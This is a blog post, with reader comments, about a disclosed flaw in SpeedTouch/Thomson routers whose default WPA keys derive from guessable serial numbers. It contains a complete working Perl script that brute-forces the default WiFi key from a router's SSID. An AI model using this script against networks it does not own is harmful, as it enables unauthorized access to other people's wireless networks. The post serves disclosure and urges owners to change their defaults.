SpeedTouch / Thomson wireless security flaws
Today having Internet access has become more of a necessity than a luxe. Internet is so common nowadays that we all have it at home and use it with all computers and even our home appliances: tv, mp3 players, tablets and game consoles. It's no sercert that Internet is everywhere and is here to stay
I remember when I had my first Internet connection at home that it was meant to be used for a single computer in the house. Using a router was not allowed by my ISP. Today not only is it allowed but most ISP even provide a modem/router with WIFI to all their clients!
This is the case here in Europe where it's common to find a lot of SpeedTouchXXYYZZ and ThomsonXXYYZZ SSID all over the place. Here in the Netherlands this is no exception: I have one, my neighbors have them and some colleagues too. It's almost unavoidable as that's what one of the biggest ISP here gives to its customers. These routers are not only popular heres but they are also used in Portugal, Spain, France and the UK.
During this last months I had some problems with my own router. While I was discussing this with a colleague I learned that all SpeedTouch routers might not be as secured we might expect, even if the device is set to use WAP2.
The problem with the device is that the the SSID and encryption key are assigned based on the serial key of each device. This shouldn't be a problem, except that the algorithm used for generating them is now know. The serial numbers of the devices are quite easy to generate and can be easily brute forced.
Not conviced? Try this simple Perl program:
#!/usr/bin/perl use strict; use warnings; use Digest::SHA1 qw(sha1_hex); my @CHAR = (0 ..9, 'A' .. 'Z'); exit main() unless caller; sub main { my ($wanted_ssid) = @ARGV or die "Usage: SSID\n"; $wanted_ssid = lc $wanted_ssid; foreach my $y (4 .. 9) { my $year = sprintf "%02d", $y; foreach my $w (1 .. 52) { my $week = sprintf "%02d", $w; foreach my $c1 (@CHAR) { foreach my $c2 (@CHAR) { foreach my $c3 (@CHAR) { my $serial = "$c1$c2$c3"; my ($key, $ssid) = compute_ssid('CP', $year, $week, $serial); print "Key $key\n" if $ssid eq $wanted_ssid; } } } } } return 0; } sub compute_ssid { my ($head, $year, $week, $serial) = @_; my $hex = join '', map { sprintf "%02X", ord($_) } split //, $serial; my $raw = join '', $head, $year, $week, $hex; my $sha1 = sha1_hex($raw); my ($key, $ssid) = ($sha1 =~ /^ (.{10}) .{24} (.{6}) $/x); return ($key, $ssid); }
The code above shows how easily it is to generate the key for a SpeedTouch / Thomson router. The Perl code is a bit slow as I haven't optimize it, nevertheless it can generate the encryption keys of a given device in about 3 minutes. All that's needed is to know the SSID of a device!
I rewrote the same program in C and made a few micro optimizations that bring the execution to 6 seconds. The code is released on github: speedkey. Feel free to give it a try.
If you own one of this devices you might want to review your settings and to change your SSID or the default password.
Yes, it works. You should already know this, but it is always to know it again. Portugal, btw. Next step, change SSID. Thanks.
Nice post!
Same issue here (Israel), but what I do is different. Since the modem/router usually have sucky router options and short distance WiFi, I hook it up to a router (WRT45G initially), removed the wireless from the modem and brought up wireless for the router, WPA2, using my own key.